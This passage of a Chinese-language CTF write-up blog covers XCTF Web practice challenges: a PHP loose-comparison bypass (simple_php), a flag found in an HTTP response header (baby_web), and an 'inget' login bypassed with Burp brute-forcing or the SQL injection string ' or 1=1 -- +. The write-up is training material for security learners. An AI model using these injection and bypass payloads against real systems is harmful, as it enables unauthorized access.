class="variable">$a</span>==<span class="number">0</span> <span class="keyword">and</span> <span class="variable">$a</span>)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$flag1</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">is_numeric</span>(<span class="variable">$b</span>))&#123;</span><br><span class="line">    <span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$b</span>&gt;<span class="number">1234</span>)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$flag2</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>首先a和b两个参数，其次都是用get提交</p>
<p>对a，比较等于0，并且为真值，即不能是0，可以使用字符串加0进行绕过，利用的是php进行数字比较时的特性。</p>
<p>对b，不能是纯数字，比较时要大于1234，直接b[]&#x3D;1234即可</p>
<h1 id="12、baby-web"><a href="#12、baby-web" class="headerlink" title="12、baby_web"></a>12、baby_web</h1><p>题目内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">想想初始页面是哪个</span><br></pre></td></tr></table></figure>

<p>index.php?  直接访问一下 访问不了</p>
<p>抓包重放一下 发现</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Flag is hidden!</span><br></pre></td></tr></table></figure>

<p>在响应包的消息头里即可看到flag</p>
<h1 id="13、inget"><a href="#13、inget" class="headerlink" title="13、inget"></a>13、inget</h1><p>打开后</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Please enter ID,and Try to bypass</span><br></pre></td></tr></table></figure>

<p>burp抓包intruder爆破即可 id一般都是数字</p>
<p>让它跑着 id常见于sql 万能密码试一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=&#x27; or 1=1 -- +</span><br></pre></td></tr></table></figure>

<p>也可以直接过</p>
<h1 id="14、"><a href="#14、" class="headerlink" title="14、"></a>14、</h1>
  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1%E3%80%81Training-WWW-Robots"><span class="toc-number">1.</span> <span class="toc-text">1、Training-WWW-Robots</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2%E3%80%81PHP2"><span class="toc-number">2.</span> <span class="toc-text">2、PHP2</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3%E3%80%81unserialize3"><span class="toc-number">3.</span> <span class="toc-text">3、unserialize3</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4%E3%80%81ics-06"><span class="toc-number">4.</span> <span class="toc-text">4、ics-06</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#5%E3%80%81view-source"><span class="toc-number">5.</span> <span class="toc-text">5、view_source</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#6%E3%80%81get-post"><span class="toc-number">6.</span> <span class="toc-text">6、get_post</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#7%E3%80%81robots"><span class="toc-number">7.</span> <span class="toc-text">7、robots</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#8%E3%80%81backup"><span class="toc-number">8.</span> <span class="toc-text">8、backup</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#8%E3%80%81cookie"><span class="toc-number">9.</span> <span class="toc-text">8、cookie</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#9%E3%80%81disabled-button"><span class="toc-number">10.</span> <span class="toc-text">9、disabled_button</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#10%E3%80%81weak-auth"><span class="toc-number">11.</span> <span class="toc-text">10、weak_auth</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#11%E3%80%81simple-php"><span class="toc-number">12.</span> <span class="toc-text">11、simple_php</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#12%E3%80%81baby-web"><span class="toc-number">13.</span> <span class="toc-text">12、baby_web</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#13%E3%80%81inget"><span class="toc-number">14.</span> <span class="toc-text">13、inget</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#14%E3%80%81"><span class="toc-number">15.</span> <span class="toc-text">14、</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&text=攻防世界Web"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&title=攻防世界Web"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&is_video=false&description=攻防世界Web"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=攻防世界Web&body=Check out this article: https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&title=攻防世界Web"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&title=攻防世界Web"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&title=攻防世界Web"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&title=攻防世界Web"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&name=攻防世界Web&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&t=攻防世界Web"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024
    Nana
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->


 
  <link
    rel="preload"
    href="/lib/font-awesome/css/all.min.css"
    as="style"
    onload="this.onload=null;this.rel='stylesheet'"
  />
  <noscript
    ><link
      rel="stylesheet"
      href="/lib/font-awesome/css/all.min.css"
  /></noscript>


    <!-- jquery -->

  
<script src="/lib/jquery/jquery.min.js"></script>





<!-- clipboard -->

  
    
<script src="/lib/clipboard/clipboard.min.js"></script>

  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
